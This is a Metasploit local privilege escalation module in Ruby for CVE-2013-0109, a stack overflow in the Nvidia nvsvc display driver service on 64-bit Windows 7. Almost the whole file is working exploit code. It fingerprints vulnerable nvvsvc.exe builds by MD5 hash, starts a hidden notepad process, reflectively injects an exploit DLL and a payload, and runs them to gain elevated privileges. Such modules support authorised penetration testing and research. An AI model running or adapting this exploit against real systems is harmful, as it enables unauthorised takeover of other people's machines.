##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/post/windows/services'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Post::Windows::Services
def initialize(info={})
super(update_info(info, {
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
interact with the service. It contains a stacked based buffer overflow as a result
of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
the service name is 'nvsvc', and the named pipe is 'nsvr'.
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Wintersmith', # Original exploit
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows x64', { } ]
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
'BadChars' => "\x00"
},
'References' =>
[
[ 'CVE', '2013-0109' ],
[ 'OSVDB', '88745' ],
[ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
],
'DisclosureDate' => 'Dec 25 2012',
'DefaultTarget' => 0
}))
end
def check
vuln_hashes = [
'43f91595049de14c4b61d1e76436164f',
'3947ad5d03e6abcce037801162fdb90d',
'3341d2c91989bc87c3c0baa97c27253b'
]
os = sysinfo["OS"]
if os =~ /windows/i
svc = service_info 'nvsvc'
if svc and svc['Name'] =~ /NVIDIA/i
vprint_good("Found service '#{svc['Name']}'")
begin
if is_running?
print_good("Service is running")
else
print_error("Service is not running!")
end
rescue RuntimeError => e
print_error("Unable to retrieve service status")
end
if sysinfo['Architecture'] =~ /WOW64/i
path = svc['Command'].gsub('"','').strip
path.gsub!("system32","sysnative")
else
path = svc['Command'].gsub('"','').strip
end
begin
hash = client.fs.file.md5(path).unpack('H*').first
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Error checking file hash: #{e}")
return Exploit::CheckCode::Detected
end
if vuln_hashes.include?(hash)
vprint_good("Hash '#{hash}' is listed as vulnerable")
return Exploit::CheckCode::Vulnerable
else
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
end
def is_running?
begin
status = service_status('nvsvc')
return (status and status[:state] == 4)
rescue RuntimeError => e
print_error("Unable to retrieve service status")
return false
end
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
print_status("Launching notepad to host the exploit...")
windir = expand_path("%windir%")
cmd = "#{windir}\\SysWOW64\\notepad.exe"
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory,
"exploits",
"CVE-2013-0109",
"nvidia_nvsvc.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid} ...")
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(host_process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status("Payload injected. Executing exploit...")
host_process.thread.create(exploit_mem + offset, payload_mem)
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end